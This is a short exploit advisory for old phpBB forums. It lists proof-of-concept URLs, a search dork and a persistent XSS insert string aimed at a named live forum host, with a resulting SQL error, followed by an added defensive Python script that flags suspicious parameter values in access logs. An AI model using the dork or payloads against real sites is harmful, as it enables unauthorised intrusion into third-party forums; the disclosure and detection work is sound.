/$$ /$$$$$$$ /$$$$$$$
| $$ | $$__ $$| $$__ $$
/$$$$$$ | $$$$$$$ /$$$$$$ | $$ \ $$| $$ \ $$
/$$__ $$| $$__ $$ /$$__ $$| $$$$$$$ | $$$$$$$
| $$ \ $$| $$ \ $$| $$ \ $$| $$__ $$| $$__ $$
| $$ | $$| $$ | $$| $$ | $$| $$ \ $$| $$ \ $$
| $$$$$$$/| $$ | $$| $$$$$$$/| $$$$$$$/| $$$$$$$/
| $$____/ |__/ |__/| $$____/ |_______/ |_______/ phpBB © 2003 - 2008
| $$ | $$
| $$ | $$
|__/ |__/
# Exploit Title: phpBB XSS+SQLi
# Date: 02/05/2023
# Exploit Author: Emiliano Febbi
# Vendor Homepage: ???
# Software Link: Google
# Version: phpBB © 2003 - 2008
# Tested on: Windows 10
# CMS: phpBB
# Dork:/forum/cal.php?cl_d=
# Vulnz: Persistent XSS + SQLi
*PoC*
[code]
http://roxasdarkest.mastertopforum.com/cal.php?cl_d=%25&cl_m=05&cl_y=2023&mode=display <= [*XSS*] #1
...
*Toplist MOD By: WyriHaximus* <= [*Persistent XSS*] #2
/forum/toplist.php?f=toplistnew
name info
------------------ -------------------
| | |
------------------ -------------------
------------------ -------------------
| bugged | bugged | insert: https://www.google.it/'>\>">
------------------ -------------------
URL banner
#tested:http://roxasdarkest.mastertopforum.com/toplist.php?f=toplistnew
...
http://roxasdarkest.mastertopforum.com/recent.php?mode=lastXdays&amount_days=4 <= [*SQLi*] #3
#error:
#SQL Error : 1064 You have an error in your SQL syntax; check the manual that corresponds to your MariaDB server version for the right syntax to use near '\' ORDER BY t.topic_last_post_id DESC LIMIT 0, 10' at line 8
[/code]
._________.
*/ ///______I
) . /_(_)
/__/*PoC End*
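
Added example, not part of the original advisory: a log-triage script that flags requests to the two GET endpoints in the PoC (cal.php and recent.php) whose parameters are not plain decimal integers. The log lines are constructed, and treating cl_d, cl_m, cl_y and amount_days as integer-only is an assumption inferred from their names and the values shown above.

```python
import re
from urllib.parse import urlsplit, parse_qs

# Assumption: these parameters should only ever carry plain integers.
NUMERIC_PARAMS = {
    "cal.php": ("cl_d", "cl_m", "cl_y"),
    "recent.php": ("amount_days",),
}
REQUEST_RE = re.compile(r'"(?:GET|POST|HEAD) (\S+) HTTP/[\d.]+"')
INTEGER_RE = re.compile(r"[0-9]+")


def suspicious_params(log_line):
    """Return [(script, param, decoded_value)] for non-integer values."""
    m = REQUEST_RE.search(log_line)
    if not m:
        return []
    url = urlsplit(m.group(1))
    script = url.path.rsplit("/", 1)[-1]
    # parse_qs percent-decodes values, so %25 is compared as "%".
    query = parse_qs(url.query, keep_blank_values=True)
    return [
        (script, param, value)
        for param in NUMERIC_PARAMS.get(script, ())
        for value in query.get(param, [])
        if not INTEGER_RE.fullmatch(value)
    ]


def scan(lines):
    """Return [(line_number, script, param, value)] over an access log."""
    hits = []
    for lineno, line in enumerate(lines, start=1):
        for finding in suspicious_params(line):
            hits.append((lineno, *finding))
    return hits


# Constructed access-log lines (documentation IP ranges), not real traffic.
SAMPLE_LOG = [
    '203.0.113.7 - - [02/May/2023:10:00:01 +0000] "GET /forum/cal.php?cl_d=%25&cl_m=05&cl_y=2023&mode=display HTTP/1.1" 200 5120',
    '198.51.100.4 - - [02/May/2023:10:00:09 +0000] "GET /forum/recent.php?mode=lastXdays&amount_days=4 HTTP/1.1" 200 8331',
    '203.0.113.7 - - [02/May/2023:10:00:15 +0000] "GET /forum/recent.php?mode=lastXdays&amount_days=4%27 HTTP/1.1" 200 912',
]

if __name__ == "__main__":
    for hit in scan(SAMPLE_LOG):
        print("line %d: %s %s=%r" % hit)
```

The toplist.php fields are form inputs, so they normally do not appear in an access log; checking them means reviewing the stored URL and banner values themselves.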